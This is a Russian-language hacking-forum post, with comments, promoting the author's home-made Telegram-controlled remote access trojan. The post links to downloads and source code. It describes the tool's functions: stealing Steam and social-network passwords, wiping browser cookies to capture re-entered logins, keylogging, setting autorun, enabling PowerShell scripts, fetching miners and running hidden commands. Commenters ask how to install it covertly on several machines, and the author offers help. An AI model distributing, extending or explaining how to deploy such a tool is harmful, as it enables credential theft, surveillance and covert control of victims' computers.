Загрузка...
Авторская статья Кража паролей "от всего" с помощью маленького РМС
  1. Енот272_inactive171964
    Енот272_inactive171964 Автор темы 29 сен 2017 Ушел на покой 372 6 сен 2017
    Этот гайд завершает мою эпопею с написанием собственного RMS (RAT). Легкий и маленький дистрибутив имеет ряд приятных функций, которые помогут вам угнать пароли от стима, одноклассников и вконтакта, а так же скачивать ПО и запускать скрипты PowerShell. Чем так хорош PowerShell? Набери в гугле это словосочетание "powershell hack" и офигей от моря различных скриптов которые позволят расширить функционал моей тулзы до небес)))

    Итак, от предисловия к делу. Основные команды управления будут показаны в видео, а так же будет показан процесс работы программы. Вы так же её можете скачать по адресу rar архив и отредактировать конфиг бота под себя - https://yadi.sk/d/4PC45dbj3NLYav
    Или скомпилировать код с помощь CX_FREEZE самостоятельно для любой винды, начиная с висты.
    Скоро код по-человечески выложу на гитхаб (уже) [https://github.com/enot-pogromist/simple_rat_bot] , там же постепенно будут появляться сниппеты PowerShell'а.
    Видео - Гайд:

    Код
    ВНИМАНИЕ! ТЕПЕРЬ РАЗАРХИВИРУЕМ и ЗАПУСКАЕМ ИЗ ПАПКИ С:\USERS\; этот костыль уберу, можно будет скидывать в любую папку и запускать из неё же.



    Основной Гайд:

    [IMG]

    Итак, при запуске sfx архива мы получаем программу, запущенную от имени администратора, для того что бы изменить два параметра реестра - на автозапуск и получение разрешения на запуск powershell скриптов, которые мы будем качать потом из интернета.

    [IMG]

    В коде функция старт выглядит именно так. Она и добавляет эти два ключа. Вызывается эта функция командой:

    [IMG]

    Далее идет стандартное приветствие, когда наш бот запустится на машине пользователя. Так мы поймем, что ключи прописаны
    и все работает штатно. Следующей командой мы можем, например, докачать какой нибудь майнер:

    [IMG]

    Нам нужно будет набрать /wget и адрес файла в интернете. Так же можно скачивать любые другие программы и скрипты.
    А следующей функцией у нас будет удаление куки всех браузеров и стима:

    [IMG]

    Она позволит стереть регистрационные данные пользователя, заставив его ввести повторно все пароли, от всех акков.
    Но пока я остановился на пяти вариантах кукис, для Хрома, ЯндексБро, Стима, Лисицы и Оперы:

    [IMG]

    Шлите мне местоположения куки других игр/приложений/всей ерунды для того что бы программа стала удобнее. Не хочется
    лазить и тереть ручками всё самому.

    А вот две следующих команды позволят нам начать слежку за клавиатурой и загрузку ***** когда мы захотим.

    [IMG]

    Эта команда запусит Кейлоггер.

    [IMG]

    А эта позволит нам скачать ****.... А теперь я расскажу еще об трех командах которые вам пригодятся, например, запуск
    программ с любыми параметрами, причем скрытый:

    [IMG]

    Это команда /cmd, а за ней будут следовать любые параметры, какие вам заблагорассудится, отчет о том как работает
    присылается тут же и вы можете просмотреть все ****.

    [IMG]

    А так же есть стандартные программы перемещения по дирректориям - ls и cd соответственно, их функционал соответствует
    BusyBox, ничего особенного вообщем:

    [IMG]

    В результате работы над этим скриптом пострадала 1 (компьютерная) мышка, 1 банка кофе, 1 блок сигарет, 1 мозг, моё
    самоуважение.

    PS. Вебка работает только тогда - когда программа - скрипт, как компилируется - падает и не поднимается. За сим эту хрень
    выбрасываю в угоду скорости и надежности.

    ЗЫ: Подпишись на Ютьюб, тебе жалко шо ле?

    #МояСтатья
     
    29 сен 2017 Изменено

Комментарии

    1. rAz_inactive92874
      rAz_inactive92874 29 сен 2017 Татар без татарки - как чай без заварки 21 11 мар 2017
      Го про майнеры, обниму и зацелую
       
    2. simplx0r
      simplx0r 1 окт 2017 Заблокирован(а) 51 10 май 2017
      годнота
       
    3. Енот272_inactive171964
      Енот272_inactive171964 Автор темы 1 окт 2017 Ушел на покой 372 6 сен 2017
      Еще не добрался до этой темы, в перспективе, может, но не в приоритете.
       
    4. TrustSeller777
      TrustSeller777 1 окт 2017 Заблокирован(а) 501 31 авг 2017
      Годно, буду ждать расширения функционала
       
    5. .hyper
      .hyper 2 окт 2017 86 27 июл 2016
      годно:vo:
       
    6. stapik
      stapik 2 окт 2017 Дедушка онлайна!! 1620 15 ноя 2016
      Молодец..если все это можешь сам..Светлая твоя голова.Удачи тебе во всем!
       
    7. ProgramDeveloper
      ProgramDeveloper 2 окт 2017 Заблокирован(а) 2 23 сен 2017
      Годно.
       
    8. sadness777
      sadness777 2 окт 2017 Заблокирован(а) 143 12 сен 2017
      Крутяяяяяя
       
    9. Mr.Shelby
      Mr.Shelby 2 окт 2017 Заблокирован(а) 230 6 апр 2017
      очень-очень годно:panda::panda:
       
    10. presiDENtKOT
      presiDENtKOT 2 окт 2017 Изменить статус 57 25 авг 2017
      Годнота подъехала)
       
    11. Ethereum_CIassic
      Ethereum_CIassic 2 окт 2017 t.me/temki_club - EZ MONEY 706 5 ноя 2016
      Накидаем лайки парню
       
    12. LevPC
      LevPC 2 окт 2017 Заблокирован(а) 120 5 июл 2017
      Еще бы это все провернуть, а то чет сложна
       
    13. Енот272_inactive171964
      Енот272_inactive171964 Автор темы 2 окт 2017 Ушел на покой 372 6 сен 2017
      не сложно, если что пиши в лс вк
       
    14. Holy_Only
      Holy_Only 2 окт 2017 Заблокирован(а) 195 2 сен 2016
      Годненько
       
    15. tyrant_inactive31523
      Можно неограниченное количество юзеров добавлять?? Если будет много, то всем одна команда будет идти?
       
    16. Kaleb80
      Kaleb80 3 окт 2017 57 27 сен 2017
      ответь пожалуйста, выше задавали уже вопрос. На сколько тачек его можно ставить на одну или несколько? И если будит запущено на нескольких то как отдельно посылать команды только одной или на оборот массово всем посылать, а не в отдельности каждой? Так же какой командой запускать на удаленной тчаке где бот, скаченный файл и желательно без палево.
       
    17. TImd_inactive104973
      TImd_inactive104973 3 окт 2017 Заблокирован(а) 161 22 апр 2017
      Эта прога как-то может раздобыть пароль от виндовс?
       
    18. Енот272_inactive171964
      Енот272_inactive171964 Автор темы 3 окт 2017 Ушел на покой 372 6 сен 2017
      Пока один юзер, это связано с внутреними ограничениями телеги, но их можно обойти, патч ждите в ближайшее время.
       
    19. Енот272_inactive171964
      Енот272_inactive171964 Автор темы 3 окт 2017 Ушел на покой 372 6 сен 2017
      Нет. Даже о таком не думал. Нафига, чел, он тебе нужен?
       
Top